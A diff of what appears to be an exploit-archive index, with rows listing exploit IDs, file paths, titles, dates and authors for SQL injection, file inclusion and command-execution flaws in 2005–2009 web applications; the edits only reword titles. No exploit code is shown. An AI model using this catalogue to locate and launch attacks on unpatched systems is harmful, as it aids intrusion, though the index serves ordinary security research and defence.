1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps,0
1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0
1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution",2005-06-21,RusH,php,webapps,0
@ -15852,7 +15857,7 @@ id,file,description,date,author,platform,type,port
1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection",2005-09-23,rgod,php,webapps,0
1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0
1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0
1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - (msg_send) SQL Injection",2005-09-28,rgod,php,webapps,0
1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' Parameter SQL Injection",2005-09-28,rgod,php,webapps,0
1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0
1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0
1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0
@ -15893,7 +15898,7 @@ id,file,description,date,author,platform,type,port
1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0
1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0
1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection",2005-12-23,krasza,php,webapps,0
1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' Parameter SQL Injection",2005-12-23,krasza,php,webapps,0
1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0
1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0
1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0
@ -16089,7 +16094,7 @@ id,file,description,date,author,platform,type,port
1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - (srch_where) SQL Injection",2006-05-16,rgod,php,webapps,0
1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0
1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0
1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0
1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0
@ -16394,13 +16399,13 @@ id,file,description,date,author,platform,type,port
2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0
2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0
2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0
2231,platforms/php/webapps/2231.php,"Simple Machines Forum 1.1 rc2 (Windows) - (lngfile) Remote Exploit",2006-08-20,rgod,php,webapps,0
2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Exploit",2006-08-20,rgod,php,webapps,0
2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0
2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - (path_pre) Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0
2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - (folderprops.php) Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0
2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0
2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0
2243,platforms/php/webapps/2243.php,"Simple Machines Forum 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - (User-Agent) SQL Injection",2006-08-23,rgod,php,webapps,0
2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0
2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0
@ -16532,7 +16537,7 @@ id,file,description,date,author,platform,type,port
2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0
2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0
2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0
2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - (cfg_serverpath) Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0
2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0
2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0
@ -16702,7 +16707,7 @@ id,file,description,date,author,platform,type,port
2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0
2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - (lib/rs.php) Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0
2607,platforms/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0
2608,platforms/php/webapps/2608.txt,"Virtual Law Office - (phpc_root_path) Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0
2608,platforms/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0
2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0
2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0
2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0
@ -17036,7 +17041,7 @@ id,file,description,date,author,platform,type,port
3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - (AMG_serverpath) Remote File Inclusion",2007-01-07,beks,php,webapps,0
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0
3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0
3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0
@ -17901,7 +17906,7 @@ id,file,description,date,author,platform,type,port
4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0
4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0
4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0
4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0
4547,platforms/php/webapps/4547.pl,"Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0
4548,platforms/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,php,webapps,0
4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0
@ -18547,24 +18552,24 @@ id,file,description,date,author,platform,type,port
5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0
5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0
5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' Parameter SQL Injection",2008-04-14,Stack,php,webapps,0
5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0
5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0
5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - 'index.php' SQL Injection",2008-04-14,"SoSo H H",php,webapps,0
5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - 'article' Parameter SQL Injection",2008-04-14,Crackers_Child,php,webapps,0
5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0
5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0
5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' Parameter SQL Injection",2008-04-15,JosS,php,webapps,0
5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0
5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0
5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0
5456,platforms/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0
5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' Parameter SQL Injection",2008-04-16,cO2,php,webapps,0
5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0
5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0
5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - 'location' Parameter Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' Parameter SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0
5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0
5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0
5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0
5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - (contact.php id) SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0
5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - (AMG_id) SQL Injection",2008-04-19,Player,php,webapps,0
5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0
5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0
5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' Parameter SQL Injection",2008-04-19,Player,php,webapps,0
5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0
5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php r' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - 'detail.php id' SQL Injection",2008-04-19,S@BUN,php,webapps,0
@ -18860,7 +18865,7 @@ id,file,description,date,author,platform,type,port
5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0
5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0
5826,platforms/php/webapps/5826.py,"Simple Machines Forum 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0
5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0
5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0
5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0
5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0
@ -18899,7 +18904,7 @@ id,file,description,date,author,platform,type,port
5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0
5869,platforms/php/webapps/5869.txt,"virtual support office-xp 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
@ -18985,7 +18990,7 @@ id,file,description,date,author,platform,type,port
5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0
5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - (lid) SQL Injection",2008-06-27,boom3rang,php,webapps,0
5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection",2008-06-27,boom3rang,php,webapps,0
5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0
5963,platforms/php/webapps/5963.txt,"Joomla! Component jabode - 'id' SQL Injection",2008-06-28,His0k4,php,webapps,0
5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",php,webapps,0
@ -19286,7 +19291,7 @@ id,file,description,date,author,platform,type,port
6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0
6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0
6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0
6392,platforms/php/webapps/6392.php,"Simple Machines Forum 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0
6392,platforms/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0
6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0
6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0
6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0
@ -19466,7 +19471,7 @@ id,file,description,date,author,platform,type,port
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) SQL Injection",2008-09-28,boom3rang,php,webapps,0
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
@ -19510,10 +19515,10 @@ id,file,description,date,author,platform,type,port
6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0
6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0
6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0
6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - (manual) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - (kat_id) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - (raceid) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0
@ -19728,7 +19733,7 @@ id,file,description,date,author,platform,type,port
6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps,0
6960,platforms/php/webapps/6960.txt,"1st News - 'products.php id' SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0
6961,platforms/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection",2008-11-02,anonymous,php,webapps,0
6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,php,webapps,0
6962,platforms/php/webapps/6962.txt,"BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,php,webapps,0
6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0
6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0
6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0
@ -19773,7 +19778,7 @@ id,file,description,date,author,platform,type,port
7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
7011,platforms/php/webapps/7011.pl,"Simple Machines Forum 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0
7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps,0
7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
@ -19902,7 +19907,7 @@ id,file,description,date,author,platform,type,port
7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0
7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0
7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) SQL Injection",2008-11-20,irk4z,php,webapps,0
7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps,0
7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0
7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0
7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
@ -20027,7 +20032,7 @@ id,file,description,date,author,platform,type,port
7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0
7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0
7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0
7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) SQL Injection",2008-12-03,"CWH Underground",php,webapps,0
7328,platforms/php/webapps/7328.pl,"Check New 4.52 - 'findoffice.php search' SQL Injection",2008-12-03,"CWH Underground",php,webapps,0
7331,platforms/php/webapps/7331.pl,"Joomla! Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0
7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0
7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0
@ -20307,7 +20312,7 @@ id,file,description,date,author,platform,type,port
7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
@ -20324,7 +20329,7 @@ id,file,description,date,author,platform,type,port
